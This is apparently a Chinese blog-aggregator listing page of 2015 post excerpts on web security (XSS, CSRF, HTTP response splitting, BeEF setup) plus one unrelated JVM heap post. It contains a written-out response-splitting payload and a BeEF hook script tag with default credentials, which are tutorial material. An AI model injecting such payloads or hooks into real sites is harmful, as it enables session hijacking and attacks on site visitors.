***General*************************************************************1、HttpSplitingstep1cn%0aContent-length:%200%0a%0aHTTP/1.1%20200%20OK%0aContent-Type:%20text/html%0aContent-length:30%0a<html>Haha</html>step2//添加Last-Modified头,设置服务..
分类:
Web程序 时间:
2015-03-30 18:57:59
阅读次数:
352
序说到 XSS 攻击,前边已经有两篇文章在讲这个事了,这次又拿出来说,主要是针对近期工作中的一些新的问题。那么之前是怎么解决问题的呢?为什么又要换解决方式?以下就具体的跟大家分享一下。旧方案公司的測试团队发现这个问题之后,就要求尽快的解决,在网上查了非常多相关的资料,也翻阅了基本安全方面的书,基于 ...
分类:
Web程序 时间:
2015-03-30 11:05:03
阅读次数:
1753
本文来自:高爽|Coder,原文地址:http://blog.csdn.net/ghsau/article/details/17027893,转载请注明。 XSS又称CSS,全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于client的攻...
分类:
其他好文 时间:
2015-03-28 17:07:56
阅读次数:
119
textarea用法一般是用来接收用户输入,用于提交到服务器端,例如 网站的评论框。如果此框也用于显示服务器端回传的内容,则有如下两种用法法1 后台直接插入法2 使用JS DOM接口赋值textareaDom.value = ""textarea content特性即法1特性, 即使将html代码段...
分类:
其他好文 时间:
2015-03-22 09:07:48
阅读次数:
287
Kalilinux系统默认未安装beef,需要自行安装12apt-getupdateapt-getinstallbeef-xss启动/usr/share/beef-xss12cd/usr/share/beef-xss./beef账号密码127.0.0.1:3000/ui/pannelbeef/beef嵌入代码<scriptsrc="Ip:3000/hook.js">与Metasploit联动Beef配置文件/usr/share/bee..
分类:
其他好文 时间:
2015-03-18 06:43:32
阅读次数:
692
Kalilinux系统默认未安装beef,需要自行安装12apt-getupdateapt-getinstallbeef-xss启动/usr/share/beef-xss12cd/usr/share/beef-xss./beef账号密码127.0.0.1:3000/ui/pannelbeef/beef嵌入代码<scriptsrc="Ip:3000/hook.js">与Metasploit联动Beef配置文件/usr/share/bee..
分类:
其他好文 时间:
2015-03-18 06:42:11
阅读次数:
187
前端主要面临俩种类型的威胁1.XSS(Cross Site Scripting) 攻击方式:恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。2.CSRF(Cross-site request forgery跨...
分类:
Web程序 时间:
2015-03-17 00:40:00
阅读次数:
235
1.HTML是一种标记语言 2.HTML元素不区分大小写 //可以在xss绕过waf时使用 3.为空元素标签 为自闭合标签 虚元素标签 用空元素标签形式表示的虚元素标签 4.一个元素可以应用多个属性,这些属性间用空格分隔 5.属性顺序没有要求 6.布尔属性 例如:disabled disabled=...
分类:
Web程序 时间:
2015-03-16 14:27:59
阅读次数:
179
堆大小设置JVM 中最大堆大小有三方面限制:相关操作系统的数据模型(32-bt还是64-bit)限制;系统的可用虚拟内存限制;系统的可用物理内存限制。32位系统下,一般限制在1.5G~2G;64为操作系统对内存无限制。我在Windows Server 2003 系统,3.5G物理内存,JDK5.0下...
分类:
其他好文 时间:
2015-03-15 21:16:01
阅读次数:
141
在那个年代,大家一般用拼接字符串的方式来构造动态 SQL 语句创建应用,于是 SQL 注入成了很流行的攻击方式。在这个年代, 参数化查询 [1] 已经成了普遍用法,我们已经离 SQL 注入很远了。但是,历史同样悠久的 XSS 和 CSRF 却没有远离我们。由于之前已经对 XSS 很熟悉了,所以我对用...
分类:
其他好文 时间:
2015-03-15 12:23:44
阅读次数:
184
